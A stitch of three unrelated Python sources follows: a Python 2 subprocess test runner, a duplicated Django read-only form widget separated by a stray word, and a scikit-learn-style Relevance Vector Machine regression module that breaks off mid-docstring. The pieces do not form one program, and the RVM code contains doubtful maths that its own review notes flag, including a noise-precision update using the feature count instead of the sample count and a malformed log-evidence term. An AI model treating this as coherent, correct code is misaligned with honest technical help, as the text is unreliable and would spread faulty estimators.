class InNone(object):
    """Stdin specification: the child process gets no input."""
    def popenarg(self):
        return subprocess.PIPE
    def commarg(self):
        # Empty string: communicate() closes the pipe immediately.
        return ''
    def __nonzero__(self):
        # Python 2 truthiness hook: "no input" is falsy.
        return False
    def decorate(self, err):
        # Nothing to report for absent input.
        pass
class InFile(object):
    """Stdin specification: feed the child the contents of a file."""
    def __init__(self, path):
        self.path = path
    def popenarg(self):
        # Hand the open file object directly to Popen as stdin.
        return open(self.path, 'rb')
    def commarg(self):
        # Nothing to push through communicate(); stdin is the file itself.
        return None
    def decorate(self, err):
        err.write(u"input file: %s\n" % repr(self.path))
    def contents(self):
        return open(self.path, 'rb').read()
class InString(object):
    """Stdin specification: feed the child a literal string."""
    def __init__(self, string):
        self.string = string
    def popenarg(self):
        return subprocess.PIPE
    def commarg(self):
        # NOTE: ``unicode`` is the Python 2 text type; text is sent as UTF-8.
        if isinstance(self.string, unicode):
            return encodings.utf_8.encode(self.string)[0]
        return self.string
    def decorate(self, err):
        write_stream(u'stdin', self.string, err)
    def contents(self):
        return self.string
def parse_input(input):
    """Map an input/output spec to an In* object: ``None`` means no input,
    ``'@path'`` means the contents of a file, anything else is a literal."""
    if input is None:
        return InNone()
    return InFile(input[1:]) if input.startswith('@') else InString(input)
class Proc(object):
    """One invocation of a child process: runs it with the given input,
    captures stdout (and optionally stderr), records the exit status, and
    tolerates the child closing stdin early (broken pipe)."""
    def __init__(self, cmd, input, cwd, geterr):
        # cmd: argv list; input: an In* object; cwd: working dir or None;
        # geterr: whether stderr should be captured.
        self.cmd = cmd
        self.input = input
        self.cwd = cwd
        self.error = None
        self.output = None
        self.geterr = geterr
        # Set when the child closes stdin before reading all input (EPIPE).
        self.broken_pipe = False
    def run(self):
        """Execute the command, storing output, error and retcode."""
        if self.geterr:
            stderr = subprocess.PIPE
        else:
            stderr = None
        proc = subprocess.Popen(
            self.cmd, cwd=self.cwd, stdin=self.input.popenarg(),
            stdout=subprocess.PIPE, stderr=stderr)
        try:
            output, error = proc.communicate(self.input.commarg())
        # NOTE: Python 2 except syntax (this is Python 2 code).
        except OSError, ex:
            # EPIPE: the child exited or closed stdin before consuming all
            # of its input; record the fact and reap the process.
            if ex.errno == errno.EPIPE:
                self.broken_pipe = True
                proc.wait()
                output = ''
                error = ''
            else:
                raise
        retcode = proc.returncode
        self.output = output
        self.error = error
        self.retcode = retcode
    def check_signal(self):
        """Raise ProcSignal if the process was killed by a signal."""
        # A negative return code means termination by that signal number.
        if self.retcode < 0:
            err = ProcSignal(-self.retcode)
            self.decorate(err)
            raise err
    def check_success(self, result):
        """Raise unless the process exited with status *result* without a
        signal or a broken pipe."""
        self.check_signal()
        if self.retcode != result:
            err = ProcFailure(self.retcode)
            self.decorate(err)
            raise err
        if self.broken_pipe:
            err = ProcPipe()
            self.decorate(err)
            raise err
    def decorate(self, err):
        """Attach command, cwd, input and stderr details to exception *err*."""
        err.write(u'command: %s\n' % ' '.join(self.cmd))
        if self.cwd is not None:
            err.write(u'cwd: %s\n' % self.cwd)
        self.input.decorate(err)
        write_stream('stderr', self.error, err)
class ProcRunner(object):
    """Runs commands and checks their exit status and output."""
    def __init__(self):
        # Capture stderr by default so failures can include it.
        self.geterr = True
    def proc(self, cmd, input, cwd):
        """Create a Proc for *cmd*; hook point for wrapper subclasses."""
        return Proc(cmd, input, cwd, self.geterr)
    def get_output(self, cmd, input=None, cwd=None, result=0):
        """Run *cmd*, require exit status *result*, and return its stdout."""
        p = self.proc(cmd, parse_input(input), cwd)
        p.run()
        p.check_success(result)
        return p.output
    def check_output(self, cmd, input=None, output=None,
                     cwd=None, result=0):
        """Run *cmd* and fail with a diff if its stdout differs from *output*.

        *output* uses the same spec syntax as *input* ('@file' or literal).
        """
        p = self.proc(cmd, parse_input(input), cwd)
        p.run()
        p.check_success(result)
        output = parse_input(output).contents()
        procout = p.output
        # NOTE: ``unicode`` is the Python 2 text type (this is Python 2 code).
        if isinstance(output, unicode):
            try:
                procout = encodings.utf_8.decode(procout)[0]
            except UnicodeDecodeError:
                err = ProcOutput()
                p.decorate(err)
                write_stream(u'output', procout, err)
                raise err
            if procout != output:
                err = ProcOutput()
                p.decorate(err)
                eout = output.splitlines(True)
                pout = procout.splitlines(True)
                err.write(u"=== diff ===\n")
                for line in difflib.Differ().compare(eout, pout):
                    err.write(line)
                raise err
        else:
            # Byte comparison: diff repr() of each line so that invisible
            # byte-level differences become visible.
            if procout != output:
                err = ProcOutput()
                p.decorate(err)
                eout = [repr(x)+'\n' for x in output.splitlines(True)]
                pout = [repr(x)+'\n' for x in procout.splitlines(True)]
                err.write(u"=== diff ===\n")
                for line in difflib.Differ().compare(eout, pout):
                    err.write(line)
                raise err
class ProcWrapper(ProcRunner):
    """ProcRunner that wraps every command in a template such as
    ``"valgrind %"``, where ``%`` marks where the real command goes."""
    def __init__(self, wrap):
        ProcRunner.__init__(self)
        parts = wrap.split()
        try:
            split_at = parts.index('%')
        except ValueError:
            raise Exception("Invalid wrapper, missing %%: %s" % repr(wrap))
        self.prefix = parts[:split_at]
        self.suffix = parts[split_at+1:]
    def proc(self, cmd, input, cwd):
        # Splice the real command into the wrapper template.
        return ProcRunner.proc(self, self.prefix + cmd + self.suffix, input, cwd)
|
from django.forms import ModelForm
from django.forms.util import flatatt
from django.forms.widgets import TextInput
from django.utils.encoding import force_unicode
from django.utils.safestring import mark_safe
from labels.models import MuseumObject
class ObjectNumberInput(TextInput):
    """
    Class for managing the object_number input editability
    """
    input_type = None  # Subclasses must define this.

    def render(self, name, value, attrs=None):
        """Render the object-number input as a fixed-width, read-only field.

        NOTE(review): indentation was lost in this copy; the reconstruction
        below applies 'readonly' and the width style unconditionally, with
        only the 'value' attribute conditional — confirm against the
        original source.
        """
        if value is None:
            value = ''
        final_attrs = self.build_attrs(attrs, type=self.input_type, name=name)
        if value != '':
            # Only add the 'value' attribute if a value is non-empty.
            final_attrs['value'] = force_unicode(self._format_value(value))
        final_attrs['readonly'] = 'readonly'
        final_attrs['style'] = 'width: 272px;'
        return mark_safe(u'<input%s />' % flatatt(final_attrs))
class EditMuseumObjectForm(ModelForm):
    """ModelForm for MuseumObject that renders the object number through the
    read-only ObjectNumberInput widget."""
    class Meta:
        model = MuseumObject
        widgets = {
            'object_number': ObjectNumberInput,
        }
syntax
from django.forms import ModelForm
from django.forms.util import flatatt
from django.forms.widgets import TextInput
from django.utils.encoding import force_unicode
from django.utils.safestring import mark_safe
from labels.models import MuseumObject
class ObjectNumberInput(TextInput):
    """
    Class for managing the object_number input editability
    """
    input_type = None  # Subclasses must define this.

    def render(self, name, value, attrs=None):
        """Render the object-number input as a fixed-width, read-only field.

        NOTE(review): indentation was lost in this copy; the reconstruction
        below applies 'readonly' and the width style unconditionally, with
        only the 'value' attribute conditional — confirm against the
        original source.
        """
        if value is None:
            value = ''
        final_attrs = self.build_attrs(attrs, type=self.input_type, name=name)
        if value != '':
            # Only add the 'value' attribute if a value is non-empty.
            final_attrs['value'] = force_unicode(self._format_value(value))
        final_attrs['readonly'] = 'readonly'
        final_attrs['style'] = 'width: 272px;'
        return mark_safe(u'<input%s />' % flatatt(final_attrs))
class EditMuseumObjectForm(ModelForm):
    """ModelForm for MuseumObject that renders the object number through the
    read-only ObjectNumberInput widget."""
    class Meta:
        model = MuseumObject
        widgets = {
            'object_number' : ObjectNumberInput,
        }
|
"""
scikit-learn style implementation of Relevance Vector Machine
based regression plus helper functions and example.
Eric Schmidt
e.schmidt@cantab.net
2017-10-20
"""
from __future__ import print_function
from sklearn import linear_model, utils, preprocessing
import sklearn
import numpy as np
from scipy import stats
import time
import matplotlib
import matplotlib.pylab as plt
matplotlib.rc('text', usetex=True)
matplotlib.rcParams['text.latex.preamble']=[r"\usepackage{amsmath}"]
def fun_wrapper(fun, k):
    """Return a callable evaluating ``fun`` at ``k`` times its argument,
    i.e. ``x -> fun(k * x)``."""
    return lambda x: fun(x * k)
def dis_wrapper(dis):
    """Return a callable evaluating the pdf of the (frozen) distribution
    ``dis``, i.e. ``x -> dis.pdf(x)``."""
    return lambda x: dis.pdf(x)
def cheb_wrapper(i, k):
    """Return a callable evaluating the i-th Chebyshev polynomial T_i.

    i: index of the single non-zero coefficient.
    k: total number of coefficients (incl. the bias).
    """
    coeffs = np.zeros(k)
    coeffs[i] = 1

    def _cheb_wrapped(x):
        return np.polynomial.chebyshev.chebval(x, coeffs)

    return _cheb_wrapped
class GaussianFeatures(sklearn.base.BaseEstimator, sklearn.base.TransformerMixin):
    """Generate Gaussian features.

    Generate a design matrix of k Gaussians starting at mu0, separated
    by dmu all with the same scale.

    Parameters
    ----------
    k : int, optional, default 10
        The number of Gaussians.
    mu0 : float, optional, default 0
        The starting point for placing the first Gaussian.
    dmu : float, optional, default 1
        The increment to use separating the Gaussians.
    scale : float, optional, default 1
        The scale of all Gaussians.
    include_bias : boolean, optional, default True
        The design matrix includes a bias column if True.

    Examples
    --------
    >>> x = np.linspace(-np.pi,np.pi,100)
    >>> trafo = GaussianFeatures(k=30,mu0=-3,dmu=.2)
    >>> X = trafo.fit_transform(x.reshape((-1,1)))
    """
    def __init__(self, k=10, mu0=0, dmu=1., scale=1., include_bias=True):
        self.k = k
        self.mu0 = mu0
        self.dmu = dmu
        self.scale = scale
        self.include_bias = include_bias

    @staticmethod
    def _basis_functions(n_features, k, include_bias, mu0, dmu, scale):
        """Return the array of basis callables (optionally prefixed by a bias)."""
        bias = np.array([lambda x: np.ones(x.shape[0])])
        G = np.array([dis_wrapper(stats.norm(loc=mu0 + _k * dmu, scale=scale))
                      for _k in range(k)])
        if include_bias:
            basis = np.concatenate((bias, G))
        else:
            basis = G
        return basis

    def fit(self, X, y=None):
        """
        Compute number of output features.

        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            The data.
        y : ignored, present for sklearn API compatibility.

        Returns
        -------
        self : instance
        """
        n_samples, n_features = utils.check_array(X).shape
        self.n_input_features_ = n_features
        self.n_output_features_ = len(self._basis_functions(
            n_features, self.k, self.include_bias, self.mu0, self.dmu, self.scale))
        return self

    def transform(self, X):
        """Applies the basis functions, returning the (n_samples, n_output_features_)
        design matrix.
        """
        sklearn.utils.validation.check_is_fitted(self, ['n_input_features_', 'n_output_features_'])
        X = sklearn.utils.validation.check_array(X, dtype=sklearn.utils.validation.FLOAT_DTYPES)
        n_samples, n_features = X.shape
        if n_features != self.n_input_features_:
            raise ValueError("X shape does not match training shape")
        # allocate output data
        XP = np.empty((n_samples, self.n_output_features_), dtype=X.dtype)
        basis = self._basis_functions(self.n_input_features_, self.k, self.include_bias,
                                      self.mu0, self.dmu, self.scale)
        for i, b in enumerate(basis):
            XP[:, i] = b(X).ravel()
        return XP

    def fit_transform(self, X, y=None):
        """Fit to X, then transform it.

        BUG FIX: the original override took only ``X``, shadowing
        ``TransformerMixin.fit_transform(X, y=None)`` with a narrower
        signature, so the transformer crashed inside ``Pipeline.fit(X, y)``.
        The optional ``y`` (ignored) restores sklearn API compatibility and
        is backward compatible for existing callers.
        """
        self.fit(X, y)
        return self.transform(X)
class FourierFeatures(sklearn.base.BaseEstimator, sklearn.base.TransformerMixin):
    """Creates the design matrix X from x using the Fourier basis set
    (sin(kx) and cos(kx) for k = 1..k-1, optionally plus a bias column).
    """
    def __init__(self, k=10, include_bias=True):
        self.k = k
        self.include_bias = include_bias

    @staticmethod
    def _basis_functions(n_features, k, include_bias):
        """Return the array of basis callables (optionally prefixed by a bias)."""
        bias = np.array([lambda x: np.ones(x.shape[0])])
        sin = np.array([fun_wrapper(np.sin, _k) for _k in range(1, k)])
        cos = np.array([fun_wrapper(np.cos, _k) for _k in range(1, k)])
        if include_bias:
            basis = np.concatenate((bias, sin, cos))
        else:
            basis = np.concatenate((sin, cos))
        return basis

    def fit(self, X, y=None):
        """
        Compute number of output features.

        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            The data.
        y : ignored, present for sklearn API compatibility.

        Returns
        -------
        self : instance
        """
        n_samples, n_features = utils.check_array(X).shape
        self.n_input_features_ = n_features
        self.n_output_features_ = len(self._basis_functions(n_features, self.k, self.include_bias))
        return self

    def transform(self, X):
        """Applies the basis functions, returning the (n_samples, n_output_features_)
        design matrix.
        """
        sklearn.utils.validation.check_is_fitted(self, ['n_input_features_', 'n_output_features_'])
        X = sklearn.utils.validation.check_array(X, dtype=sklearn.utils.validation.FLOAT_DTYPES)
        n_samples, n_features = X.shape
        if n_features != self.n_input_features_:
            raise ValueError("X shape does not match training shape")
        # allocate output data
        XP = np.empty((n_samples, self.n_output_features_), dtype=X.dtype)
        basis = self._basis_functions(self.n_input_features_, self.k, self.include_bias)
        for i, b in enumerate(basis):
            XP[:, i] = b(X).ravel()
        return XP

    def fit_transform(self, X, y=None):
        """Fit to X, then transform it.

        BUG FIX: the original override took only ``X``, shadowing
        ``TransformerMixin.fit_transform(X, y=None)`` with a narrower
        signature, so the transformer crashed inside ``Pipeline.fit(X, y)``.
        The optional ``y`` (ignored) restores sklearn API compatibility and
        is backward compatible for existing callers.
        """
        self.fit(X, y)
        return self.transform(X)
class ChebyshevFeatures(sklearn.base.BaseEstimator, sklearn.base.TransformerMixin):
    """Creates the design matrix X from x using Chebyshev polynomials
    (T_1..T_{k-1}, optionally plus a bias column).
    """
    def __init__(self, k=10, include_bias=True):
        self.k = k
        self.include_bias = include_bias

    @staticmethod
    def _basis_functions(n_features, k, include_bias):
        """Return the array of basis callables (optionally prefixed by a bias)."""
        bias = np.array([lambda x: np.ones(x.shape[0])])
        T = np.array([cheb_wrapper(_k, k) for _k in range(1, k)])
        if include_bias:
            basis = np.concatenate((bias, T))
        else:
            basis = T
        return basis

    def fit(self, X, y=None):
        """
        Compute number of output features.

        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            The data.
        y : ignored, present for sklearn API compatibility.

        Returns
        -------
        self : instance
        """
        n_samples, n_features = utils.check_array(X).shape
        self.n_input_features_ = n_features
        self.n_output_features_ = len(self._basis_functions(n_features, self.k, self.include_bias))
        return self

    def transform(self, X):
        """Applies the basis functions, returning the (n_samples, n_output_features_)
        design matrix.
        """
        sklearn.utils.validation.check_is_fitted(self, ['n_input_features_', 'n_output_features_'])
        X = sklearn.utils.validation.check_array(X, dtype=sklearn.utils.validation.FLOAT_DTYPES)
        n_samples, n_features = X.shape
        if n_features != self.n_input_features_:
            raise ValueError("X shape does not match training shape")
        # allocate output data
        XP = np.empty((n_samples, self.n_output_features_), dtype=X.dtype)
        basis = self._basis_functions(self.n_input_features_, self.k, self.include_bias)
        for i, b in enumerate(basis):
            XP[:, i] = b(X).ravel()
        return XP

    def fit_transform(self, X, y=None):
        """Fit to X, then transform it.

        BUG FIX: the original override took only ``X``, shadowing
        ``TransformerMixin.fit_transform(X, y=None)`` with a narrower
        signature, so the transformer crashed inside ``Pipeline.fit(X, y)``.
        The optional ``y`` (ignored) restores sklearn API compatibility and
        is backward compatible for existing callers.
        """
        self.fit(X, y)
        return self.transform(X)
def full_weight_vector(w, active, inactive):
    """Returns a zero-padded weights vector for RVM weights.

    Parameters
    ----------
    w : float np.ndarray of shape [n_active]
        Weights vector obtained with an RVM containing only non-zero values.
    active : int np.ndarray of shape [n_active]
        Index vector indicating the positions of the 'w' values in the
        full weights vector.
    inactive : int np.ndarray of shape [n_features - n_active]
        Index vector indicating the positions of 0s in the full weights
        vector.

    Returns
    -------
    w_full : float np.ndarray of shape [n_features]
        Full weights vector.
    """
    n_features = len(active) + len(inactive)
    padded = np.zeros(n_features)
    padded[active] = w
    return padded
class RelevanceVectorMachine(linear_model.base.LinearModel,sklearn.base.RegressorMixin):
    """Relevance vector machine regression.

    Fits the weights of a linear model. The weights of the model are assumed to
    be normally distributed. RVMs also estimate the parameters alpha (precisions
    of the distributions of the weights) and beta (precision of the distribution
    of the noise) using type-II maximum likelihood or evidence maximization pruning
    weights, thus leading to sparse weights vectors.
    The algorithm is implemented as described by Faul and Tipping, 2003, AISTAT,
    https://pdfs.semanticscholar.org/11f4/d997de8e35a1daf8b115439345d9994cfb69.pdf.

    Parameters
    ----------
    n_iter : int
        maximum number of iterations
    tol : float, optional, default 1.e-3
        weights convergence tolerance threshold
    compute_score : boolean, optional, default False
        whether or not to compute mse and estimate and standard
        deviation of the deviation
    fit_intercept : boolean, optional, default False
        whether or not to fit the intercept
    normalize : boolean, optional, default False
    copy_X : boolean, optional, default True
    verbose : boolean, optional, default False
    init_beta : float or callable, optional, default None
        if float needs to be bigger than 0
        elif callable then the function needs to return a single value
    init_alphas : np.ndarray list or tuple of float or callable, optional, default None
        same as for init_beta but for a vector of values
    do_logbook : boolean
        whether or not to keep the logbook during regression:
        logbook = {"L":[],"alphas":[],"beta":[],"weights":[],"weights_full":[],"mse":[],"tse":[],"min":[],"max":[],"Sigma":[],
                   "dev_est":[],"dev_std":[],"median_se":[]}

    Attributes
    ----------
    beta_ : float
        noise precision
    alphas_ : np.ndarray (n_features,) of float
        weight precisions
    active : np.ndarray (n_active,) of int
        indices to places in the full weights vector to currently active weights
    inactive : np.ndarray (n_active,) of int
        indices to places in the full weights vector to currently inactive weights
    n_iter : int
        maximum number of iterations
    tol : float
        weight convergence tolerance
    compute_score : boolean
        stores mse_, dev_est and dev_std if true
    mse_ : list of float
        mean square errors = (t-y)**2/n_samples
    dev_est : list of float
        estimate of deviation = (t-y)/n_samples
    dev_std : list of float
        one standard deviation of the deviations = np.std(t-y,ddof=1)
    sigma_ : np.ndarray (n_features,n_features) of float
        contains the posterior covariance matrix of p(t|Xw,beta)*p(w|alphas)
    do_logbook : boolean
    logbook : dict of lists

    Example
    -------
    >>> from linear_model import RelevanceVectorMachine
    >>> from sklearn import preprocessing
    >>> import numpy as np
    >>> from scipy import stats
    >>> x = np.linspace(-np.pi,np.pi,100)
    >>> x_pred = np.linspace(-np.pi,np.pi,200)
    >>> epsilon = stats.norm(loc=0,scale=0.01)
    >>> t = np.exp(-x**2) + epsilon.rvs(size=x.shape[0])
    >>> k = 5
    >>> trafo = preprocessing.PolynomialFeatures(k)
    >>> X = trafo.fit_transform(x.reshape((-1,1)))
    >>> init_beta = 1./ np.var(t) # (that's the default start)
    >>> init_alphas = np.ones(X.shape[1])
    >>> init_alphas[1:] = np.inf
    >>> model = RelevanceVectorMachine(n_iter=50,verbose=False,compute_score=True,init_beta=init_beta,
    ...                                init_alphas=init_alphas)
    >>> model.fit(X,t)
    RelevanceVectorMachine(compute_score=True, copy_X=True, fit_intercept=True,
                init_alphas=array([  1.,  inf,  inf,  inf,  inf,  inf]),
                init_beta=8.2821399938358535, n_iter=50, normalize=False,
                tol=0.001, verbose=False)
    >>> y, yerr = model.predict(X,return_std=True)

    Notes
    -----
    The notation here is adopted from Tipping 2001, Faul and Tipping 2003 and Bishop's "Pattern
    Recognition and Machine Learning" book. No jumping in the sewer!

    References
    ----------
    Mike Tipping's favorite implementation: http://www.miketipping.com/downloads.htm
    David MacKay's 1992, Bayesian Interpolation
    http://www.utstat.toronto.edu/~rsalakhu/sta4273/notes/Lecture2.pdf
    http://statweb.stanford.edu/~tibs/sta305files/Rudyregularization.pdf -> Ridge regression and SVD
    http://www.statisticshowto.com/wp-content/uploads/2017/07/lecture-notes.pdf -> Ridge regression and SVD and Woodbury
    """
    def __init__(self, n_iter=300, tol=1.e-3, compute_score=False,
                 fit_intercept=False, normalize=False, copy_X=True,
                 verbose=False,init_beta=None,init_alphas=None,do_logbook=False):
        self.n_iter = n_iter
        self.tol = tol
        self.compute_score = compute_score
        self.fit_intercept = fit_intercept
        self.normalize = normalize
        self.copy_X = copy_X
        self.verbose = verbose
        self.init_beta = init_beta
        self.init_alphas = init_alphas
        # per-fit diagnostics, reset again at the top of fit()
        self.mse_ = []
        self.dev_est = [] # deviation estimate
        self.dev_std = [] # deviation standard deviation
        self.do_logbook = do_logbook
        self.logbook = {"L":[],"alphas":[],"beta":[],"weights":[],"weights_full":[],"mse":[],"tse":[],"min":[],"max":[],"Sigma":[],
                        "dev_est":[],"dev_std":[],"median_se":[]}

    @staticmethod
    def _initialize_beta(y,init_beta=None,verbose=False):
        """Return the initial noise precision beta.

        Defaults to 1/var(y). A callable ``init_beta`` is invoked and must
        return a positive scalar; a numeric ``init_beta`` is copied as given;
        anything else raises ValueError.
        """
        beta_ = 1. / np.var(y) # default
        if not init_beta is None:
            if callable(init_beta):
                if verbose: print("Setting beta_ = init_beta()")
                beta_ = init_beta()
                assert beta_ > 0., "init_beta() produced an invalid beta_ value = {}".format(beta_)
            elif isinstance(init_beta,(int,float)):
                if verbose: print("Setting beta_ = init_beta")
                beta_ = np.copy(init_beta)
            else:
                raise ValueError("Do not understand self.init_beta = {}".format(init_beta))
        else:
            if verbose:
                print("Setting default beta_ = 1/var(t)")
        return beta_

    @staticmethod
    def _initialize_alphas(X,init_alphas=None,verbose=False):
        """Return the initial weight-precision vector alphas.

        Default: only the first basis function active (alpha_0 = 1, all other
        alphas = inf, cf. Faul and Tipping 2003 p.4). A callable ``init_alphas``
        is invoked with X and must return strictly positive values; a
        list/tuple/ndarray is copied; anything else raises ValueError.
        """
        n_samples, n_features = X.shape
        alphas_ = np.ones(n_features) # default
        alphas_[1:] = np.inf # setting all but one basis function as inactive (see Faul and Tipping 2003 p.4)
        if not init_alphas is None:
            if callable(init_alphas):
                if verbose: print("Setting alphas_ = init_alphas()")
                alphas_ = init_alphas(X)
                assert (alphas_ > 0.).all(), "init_alphas() produced an invalid alphas_ array = {}".format(alphas_)
            elif isinstance(init_alphas,(list,tuple,np.ndarray)):
                if verbose: print("Setting alphas_ = init_alphas")
                alphas_ = np.copy(init_alphas)
            else:
                raise ValueError("Do not understand self.init_alphas = {}".format(init_alphas))
        else:
            if verbose:
                print("Setting default alphas_ = [1,inf,inf,...]")
        return alphas_

    def fit(self, X, y):
        """Fit the model.

        Iterates posterior weight updates, beta re-estimation and
        alpha-based pruning (Faul & Tipping 2003) until the full weight
        vector changes by less than ``tol`` or ``n_iter`` is reached.

        Parameters
        ----------
        X : numpy array of shape [n_samples,n_features]
            Training data
        y : numpy array of shape [n_samples]
            Target values. Will be cast to X's dtype if necessary

        Returns
        -------
        self : returns an instance of self.
        """
        # reset per-fit diagnostic accumulators
        self.mse_ = []
        self.dev_est = []
        self.dev_std = []
        X, y = utils.check_X_y(X, y, dtype=np.float64, y_numeric=True)
        X, y, X_offset_, y_offset_, X_scale_ = self._preprocess_data(
            X, y, self.fit_intercept, self.normalize, self.copy_X)
        self.X_offset_ = X_offset_
        self.X_scale_ = X_scale_
        n_samples, n_features = X.shape
        verbose = self.verbose
        # Initialization of the hyperparameters
        beta_ = self._initialize_beta(y,init_beta=self.init_beta,verbose=self.verbose)
        alphas_ = self._initialize_alphas(X,init_alphas=self.init_alphas,verbose=self.verbose)
        self.scores_ = list()
        coef_old_ = None
        XT_y = np.dot(X.T, y)  # NOTE(review): computed but never used below
        # Convergence loop of the RVM regression
        for iter_ in range(self.n_iter):
            # (in-)active basis functions: finite alpha = active, inf alpha = pruned
            active = np.where(np.isfinite(alphas_))[0]
            n_active = active.shape[0]
            inactive = np.where(np.isinf(alphas_))[0]
            # corresponding Sigma matrix (weights hyperprior covariance matrix)
            # NOTE(review): the full Sigma is never used below (only Sigma_a is)
            Sigma = np.diag(alphas_)
            Sigma_a = np.diag(alphas_[active]) # active part of Sigma -> numpy select?
            X_a = X[:,active] # active part of the design matrix
            # weights posterior mean (w_new) and covariance (A_new)
            A_new = np.linalg.inv(beta_ * X_a.T.dot(X_a) + Sigma_a)
            w_new = beta_ * A_new.dot(X_a.T.dot(y))
            # residuals and TOTAL squared error (stored as mse_/n_samples below)
            dt = y - np.dot(X_a, w_new)
            mse_ = np.sum((dt) ** 2)
            # Recompute beta
            # NOTE(review): Tipping's update is beta = (N - sum_i gamma_i)/||t - Phi mu||^2
            # with N = n_samples; n_features is used here instead -- confirm intent.
            beta_ = (n_features - n_active + np.sum(alphas_[active]*np.diag(A_new)))
            beta_ /= mse_
            # Compute objective function: Gaussian for p(w|X,t,alphas,beta) \propto p(t|Xw,beta)p(w|alphas)
            if self.compute_score:
                # NOTE(review): prefactor uses (beta - 2*pi) rather than log-terms
                # (log beta, log 2*pi) -- confirm against the intended log-evidence.
                log_prefactor = n_features*(beta_ - 2.*np.pi) - alphas_[active].sum() - 2.*np.pi
                log_likelihood = -beta_ * mse_
                log_prior = - w_new.T.dot(Sigma_a.dot(w_new))
                log_posterior = .5 * (log_prefactor + log_likelihood + log_prior)
                self.scores_.append(log_posterior)
                self.mse_.append(float(mse_/n_samples))
                self.dev_est.append(dt.mean())
                self.dev_std.append(dt.std(ddof=1))
            if self.do_logbook:
                # NOTE(review): this local dict is dead code -- entries are
                # appended to self.logbook (initialized in __init__) instead.
                logbook = {"L":[],"alphas":[],"beta":[],
                           "weights":[],"weights_full":[],"mse":[],"tse":[],"min":[],"max":[],"Sigma":[],
                           "dev_est":[],"dev_std":[],"median_se":[]}
                if self.compute_score:
                    self.logbook["L"].append(self.scores_[-1])
                else:
                    log_prefactor = n_features*(beta_ - 2.*np.pi) - alphas_[active].sum() - 2.*np.pi
                    log_likelihood = -beta_ * mse_
                    log_prior = - w_new.T.dot(Sigma_a.dot(w_new))
                    log_posterior = .5 * (log_prefactor + log_likelihood + log_prior)
                    self.logbook["L"].append(log_posterior)
                # NOTE(review): alphas_ is appended by reference and mutated
                # in place at the end of each iteration, so all stored entries
                # alias the same (final) array -- confirm whether a copy is wanted.
                self.logbook["alphas"].append(alphas_)
                self.logbook["beta"].append(beta_)
                self.logbook["weights"].append(w_new)
                self.logbook["weights_full"].append(full_weight_vector(w_new,active,inactive))
                self.logbook["mse"].append(mse_/n_samples)
                self.logbook["tse"].append(mse_)
                self.logbook["min"].append(np.amin(dt))
                self.logbook["max"].append(np.amax(dt))
                self.logbook["dev_est"].append(dt.mean())
                self.logbook["dev_std"].append(dt.std())
                self.logbook["median_se"].append(np.median(dt))
            # Check for convergence: L1 change of the zero-padded weight vector
            if iter_ != 0 and np.sum(np.abs(full_weight_vector(np.copy(w_new),active,inactive) - coef_old_)) < self.tol:
                if verbose:
                    print("Convergence after ", str(iter_), " iterations")
                break
            elif iter_ == self.n_iter-1:
                if verbose:
                    print("Iteration terminated after n_iter = {} step(s)".format(self.n_iter))
                break
            coef_old_ = full_weight_vector(np.copy(w_new),active,inactive)
            # Compute S and Q (Faul and Tipping 2003 eqs. 24 & 25)
            S0_tilde = beta_ * np.einsum("nm,nm->m", X, X) # in R^(n_features)
            S1_tilde = - beta_**2 * np.einsum("mn,na->ma",X.T,np.dot(X_a,A_new)) # in R^(n_features x n_active)
            S2_tilde = np.einsum("na,nm->am",X_a, X) # in R^(n_active x n_features)
            S = S0_tilde + np.einsum("ma,am->m",S1_tilde,S2_tilde)
            Q0_tilde = beta_ * np.einsum("nm,n->m", X, y) # in R^(n_features)
            Q2_tilde = np.einsum("na,n->a",X_a, y) # in R^(n_active)
            Q = Q0_tilde + np.einsum("ma,a->m",S1_tilde,Q2_tilde)
            # Compute s and q (note the lower case): leave-one-out sparsity/quality factors
            s = np.copy(S)
            q = np.copy(Q)
            s[active] = alphas_[active]*S[active]/(alphas_[active]-S[active])
            q[active] = alphas_[active]*Q[active]/(alphas_[active]-S[active])
            # Recompute alphas using pruning: keep basis functions with q^2 > s,
            # set alpha = s^2/(q^2 - s) for those, inf (pruned) for the rest
            active = np.where(q**2>s)[0]
            inactive = np.where(np.logical_not(q**2>s))[0]
            alphas_[inactive] = np.inf
            alphas_[active] = s[active]**2/(q[active]**2-s[active])
        # expose the final state; coef_ holds only the active weights
        self.coef_ = w_new
        self.active = active
        self.inactive = inactive
        self.sigma_ = A_new
        self.beta_ = beta_
        self._set_intercept(X_offset_[active], y_offset_, X_scale_[active])
        return self

    def predict(self, X, return_std=False):
        """Predict using the linear model.

        In addition to the mean of the predictive distribution, also its
        standard deviation can be returned.

        Parameters
        ----------
        X : {array-like, sparse matrix}, shape = (n_samples, n_features)
            Samples.
        return_std : boolean, optional
            Whether to return the standard deviation of posterior prediction.

        Returns
        -------
        y_mean : array, shape = (n_samples,)
            Mean of predictive distribution of query points.
        y_std : array, shape = (n_samples,)
            Standard deviation of predictive distribution of query points.
        """
        # only the active columns contribute; coef_/sigma_ are in active space
        X_a = X[:,self.active]
        y_mean = self._decision_function(X_a)
        if return_std is False:
            return y_mean
        else:
            if self.normalize:
                # NOTE(review): X_offset_/X_scale_ were stored with n_features
                # entries while X_a holds only the active columns -- confirm
                # the shapes are compatible when normalize=True.
                X_a = (X_a - self.X_offset_) / self.X_scale_
            # predictive variance = data term + noise term 1/beta
            sigmas_squared_data = (X_a.dot(self.sigma_) * X_a).sum(axis=1)
            y_std = np.sqrt(sigmas_squared_data + (1. / self.beta_))
            return y_mean, y_std

    def get_full_weights_vector(self):
        """Return the weights zero-padded to the full feature dimension."""
        return full_weight_vector(self.coef_,self.active,self.inactive)

    def get_logbook(self):
        """Return the per-iteration logbook; requires do_logbook=True."""
        assert self.do_logbook, "Logbook empty because do_logbook = {}.".format(self.do_logbook)
        return self.logbook
def distribution_wrapper(dis, size=None, single=True):
    """Wrap a scipy.stats-like distribution for RVM initialization.

    Parameters
    ----------
    dis : object exposing ``rvs``
        Source of random draws (e.g. a frozen scipy.stats distribution).
    size : int, optional
        How many samples to draw (used only when ``single`` is False).
    single : boolean
        If True the returned callable yields a single float. Otherwise it
        yields an array of ``size`` samples, or -- when the design matrix X
        is passed to the callable instead -- ``X.shape[1]`` samples.

    Returns
    -------
    samples : callable
        ``samples(X=None)`` producing the draw(s) described above; raises
        ``ValueError`` when neither ``size`` nor an ndarray X is available.

    Example
    -------
    >>> init_beta = distribution_wrapper(stats.halfnorm(scale=1),size=1,single=True)
